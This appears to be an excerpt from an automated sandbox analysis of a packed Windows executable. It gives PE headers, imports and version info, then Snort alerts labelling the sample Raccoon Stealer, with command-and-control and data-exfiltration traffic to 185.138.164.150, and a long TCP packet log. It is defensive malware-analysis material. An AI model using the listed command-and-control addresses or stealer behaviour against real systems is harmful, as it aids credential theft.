IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a480	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x59000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x57520	0x57600	False	0.964011087268	data	7.9745561755	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x59000	0x31f4	0x3200	False	0.25765625	data	4.21066679958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d000	0x8557c	0x1e00	False	0.118229166667	data	1.32535671039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe3000	0x10bd0	0x10c00	False	0.688243353545	data	6.33192335867	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xe3570	0xea8	data	English	United States
RT_ICON	0xe4418	0x8a8	data	English	United States
RT_ICON	0xe4cc0	0x6c8	data	English	United States
RT_ICON	0xe5388	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe58f0	0x25a8	data	English	United States
RT_ICON	0xe7e98	0x10a8	data	English	United States
RT_ICON	0xe8f40	0x988	data	English	United States
RT_ICON	0xe98c8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe9da8	0x6c8	data	English	United States
RT_ICON	0xea470	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xea9d8	0x25a8	data	English	United States
RT_ICON	0xecf80	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xed428	0xea8	data	English	United States
RT_ICON	0xee2d0	0x8a8	data	English	United States
RT_ICON	0xeeb78	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xef0e0	0x25a8	data	English	United States
RT_ICON	0xf1688	0x10a8	data	English	United States
RT_ICON	0xf2730	0x988	data	English	United States
RT_ICON	0xf30b8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0xf37a8	0x424	data
RT_ACCELERATOR	0xf3588	0x50	data
RT_ACCELERATOR	0xf35d8	0x20	data
RT_GROUP_ICON	0xed3e8	0x3e	data	English	United States
RT_GROUP_ICON	0xe9d30	0x76	data	English	United States
RT_GROUP_ICON	0xf3520	0x68	data	English	United States
RT_VERSION	0xf35f8	0x1b0	data

Imports

DLL

Import

KERNEL32.dll

GetCommandLineW, HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedDecrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, FindNextVolumeW, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetCommandLineA, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA

USER32.dll

GetCursorPos

Exports

Name	Ordinal	Address
@SetViceVariants@12	1	0x401000

Version Infos

Description	Data
InternalName	sajbmiamezu.ise
ProductVersion	8.64.59.5
Copyright	Copyrighz (C) 2021, fudkagat
Translation	0x0127 0x0081

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-23:55:24.661582	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49745	80	192.168.2.3	185.138.164.150
09/27/21-23:55:27.794083	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49745	80	192.168.2.3	185.138.164.150
09/27/21-23:55:35.209006	TCP	2033974	ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt	49745	80	192.168.2.3	185.138.164.150

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 23:55:23.672564030 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.672602892 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.672676086 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.677145004 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.677162886 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.782082081 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.782202005 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.784280062 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.784290075 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.784584045 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.975723028 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.014197111 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.055144072 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076370955 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076400042 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076428890 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076492071 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076503992 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.076535940 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.078093052 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.078135014 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.078222036 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.078243017 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.084980965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.119972944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.120140076 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.120461941 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.120522976 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.154823065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.154850006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629426003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629452944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629466057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629476070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629508018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629730940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629698992 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.629918098 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.661581993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.696244955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899183035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899215937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899272919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899341106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899398088 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.899436951 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.899614096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899766922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899840117 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.899844885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899862051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899923086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.901185036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.901218891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.901292086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.937521935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.937587976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.937705040 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.939920902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940005064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940052032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940088987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940121889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940135002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940160036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940186977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940224886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940247059 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940273046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940330029 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940332890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940368891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940411091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940444946 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940469027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940521955 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940526962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940577984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940619946 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940633059 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940658092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940689087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940710068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940977097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.941165924 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.974735022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.974771023 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.974843979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.976540089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.976573944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.976669073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.978956938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.978975058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.979358912 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981359005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981408119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981430054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981447935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981472015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981497049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981519938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981534958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981553078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981570005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981580973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981586933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981602907 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981621027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981627941 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981650114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981671095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981676102 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981686115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981717110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981750965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981887102 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.982044935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.982101917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.982121944 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.982189894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.982215881 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.982243061 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.982249975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.982311964 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.982325077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.982374907 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.016987085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017183065 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.017671108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017838001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017868996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017891884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017914057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017935991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017971992 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.017992020 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018013000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018037081 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018060923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018085003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018105030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018126011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018148899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018199921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018220901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018243074 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018264055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.018392086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018419027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018424988 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018428087 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018430948 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018435001 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018438101 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018440962 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018444061 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018445969 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018449068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018451929 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.018455029 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.022597075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.022680044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.022697926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.022839069 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.022866964 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.022871017 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.024350882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.024383068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.024539948 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.026185036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.055619001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.055762053 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.056924105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057045937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057050943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057075024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057161093 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057192087 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057214975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057236910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057260990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057274103 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057285070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057287931 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057348013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057396889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057415962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057487011 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057553053 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057569027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057593107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.057689905 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.057708025 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.060146093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.060178995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.060203075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.060595036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.068361044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.068416119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.068439960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.068464041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.068485975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.068559885 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.068608999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.092413902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097467899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097507954 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097527981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097546101 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097568035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097585917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097606897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097629070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097634077 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097650051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097670078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097692013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097704887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097711086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097712994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097714901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097733974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097754955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097775936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097795010 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097799063 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097815037 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097856045 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097858906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097865105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097884893 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097904921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097927094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097930908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097939014 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.097944975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097964048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097992897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.097999096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098016024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098037958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098045111 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.098061085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098081112 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098100901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.098107100 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.098109961 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.098320007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098340034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098393917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098457098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.098691940 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.099673033 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.103214979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.105370045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.105401039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.105427980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.105448961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.109334946 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.112543106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.112576008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.112596989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.112621069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.112646103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.117482901 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:25.142985106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143023968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143038988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143054008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:25.143069983 CEST	80	49745	185.138.164.150	192.168.2.3
